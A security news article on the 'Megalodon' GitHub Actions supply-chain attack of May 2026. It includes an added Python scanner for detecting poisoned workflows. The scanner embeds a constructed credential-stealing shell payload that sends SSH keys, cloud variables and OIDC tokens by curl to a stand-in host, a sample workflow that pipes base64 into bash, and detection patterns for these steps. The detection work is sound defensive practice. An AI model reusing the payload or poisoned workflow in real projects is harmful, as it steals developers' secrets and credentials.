Unprecedented ‘Megalodon’ Attack Breaches Over 5,500 GitHub Repositories
An automated supply chain attack of unprecedented scale, dubbed “Megalodon”, hit GitHub on May 18, 2026. In roughly six hours it injected malicious code into more than 5,500 repositories, making it one of the most aggressive GitHub Actions poisoning campaigns on record.
Cybersecurity firm SafeDep reports that the attackers pushed 5,718 malicious commits between 11:36 and 17:48 UTC, using throwaway accounts and forged committer identities such as “build-bot” and “auto-ci” so that the commits looked like routine automated maintenance. The commits added GitHub Actions workflows carrying base64-encoded payloads built to harvest CI secrets, cloud credentials, SSH keys and OIDC tokens from the runner and exfiltrate them to a command-and-control server.
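The mechanism described above (a workflow step that decodes a base64 blob and pipes it into a shell, with repository secrets and an OIDC token within reach) can be screened for in a repository's `.github/workflows` directory. The following is an added example written for this page, not SafeDep's tooling or anything recovered from the campaign: the two sample workflows, the embedded payload and the collector hostname are constructed, and the indicator patterns are this editor's assumptions about what such a payload references. Any secret a flagged workflow could read should be treated as exposed and rotated.

```python
import base64
import glob
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample payload (not the campaign's real script): the kind of
# secret-harvesting shell the article describes, hidden behind base64.
PAYLOAD = (
    "env | grep -E '^(AWS_|AZURE_|GOOGLE_)' > /tmp/.c\n"
    "cat ~/.ssh/id_* >> /tmp/.c 2>/dev/null\n"
    'curl -s -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" '
    '"$ACTIONS_ID_TOKEN_REQUEST_URL&audience=example" >> /tmp/.c\n'
    "curl -s -X POST --data-binary @/tmp/.c https://collector.example.invalid/upload\n"
)
ENCODED = base64.b64encode(PAYLOAD.encode()).decode()

# Constructed workflows: one benign, one poisoned in the way the article describes.
CLEAN_WORKFLOW = """\
name: CI
on: [push, pull_request]
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""

POISONED_WORKFLOW = f"""\
name: CI
on: [push, pull_request]
permissions:
  contents: read
  id-token: write
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
      - name: Cache warmup
        env:
          CI_CONTEXT: ${{{{ toJSON(secrets) }}}}
        run: echo "{ENCODED}" | base64 -d | bash
"""

# A base64 decode piped straight into an interpreter on the same line.
DECODE_TO_SHELL_RE = re.compile(
    r"base64\s+(?:-d|-D|--decode)\b[^\n]*\|\s*(?:sudo\s+)?"
    r"(?:(?:ba|z|da)?sh|python\d?|node|perl)\b"
)
SECRETS_DUMP_RE = re.compile(r"toJSON\(\s*secrets\s*\)")   # hands every secret to a step
ID_TOKEN_WRITE_RE = re.compile(r"id-token:\s*write")       # step can mint OIDC tokens
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")          # candidate base64 blobs

# Assumed indicators of a payload going after the assets the article lists.
INDICATORS = {
    "oidc_token": re.compile(r"ACTIONS_ID_TOKEN_REQUEST_(?:TOKEN|URL)"),
    "ssh_keys": re.compile(r"\.ssh/"),
    "cloud_creds": re.compile(r"\b(?:AWS_|AZURE_|GOOGLE_)\w*"),
    "exfil": re.compile(r"\b(?:curl|wget)\b[^\n]*https?://"),
}


@dataclass
class Finding:
    rule: str
    detail: str


def decode_blob(blob: str) -> Optional[str]:
    """Return the decoded text if blob is valid base64 for readable text, else None."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def scan_workflow(text: str) -> List[Finding]:
    """Run the rules over one workflow file's raw text (no YAML parser needed)."""
    findings: List[Finding] = []
    if DECODE_TO_SHELL_RE.search(text):
        findings.append(Finding("decode-to-shell", "base64 decode piped into an interpreter"))
    if SECRETS_DUMP_RE.search(text):
        findings.append(Finding("all-secrets-exposed", "toJSON(secrets) exposes every repository secret"))
    if ID_TOKEN_WRITE_RE.search(text):
        findings.append(Finding("id-token-write", "informational: workflow may request OIDC tokens"))
    for blob in BLOB_RE.findall(text):
        decoded = decode_blob(blob)
        if decoded is None:
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if hits:
            findings.append(Finding("hidden-payload", "decoded blob references: " + ", ".join(hits)))
    return findings


def scan_repo(repo_root: str) -> Dict[str, List[Finding]]:
    """Scan every workflow under <repo_root>/.github/workflows; return only files with findings."""
    results: Dict[str, List[Finding]] = {}
    for path in glob.glob(os.path.join(repo_root, ".github", "workflows", "*.y*ml")):
        with open(path, encoding="utf-8") as fh:
            hits = scan_workflow(fh.read())
        if hits:
            results[path] = hits
    return results


if __name__ == "__main__":
    for label, workflow in (("clean", CLEAN_WORKFLOW), ("poisoned", POISONED_WORKFLOW)):
        print(label, [(f.rule, f.detail) for f in scan_workflow(workflow)])
```

The scanner works on raw text rather than parsed YAML so that a payload split across folded scalars or unusual quoting still gets caught; the `id-token-write` rule is informational on its own, since many legitimate workflows request OIDC tokens, and only matters alongside the other findings.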
The attack had a significant impact on Tiledesk, an open-source live chat platform: nine of its repositories were compromised, and the maintainer unknowingly published seven infected versions of the @tiledesk/tiledesk-server package to npm between May 19 and 21. A follow-up analysis by Hudson Rock found that over 33% of the affected accounts had been compromised using GitHub credentials harvested by infostealer malware on the account holders' machines.
“We’ve entered a new supply chain attack era,” warned Moshe Siman Tov Bustan of OX Security, predicting an “endless wave” of similar attacks targeting developers worldwide.
Source: Security Week
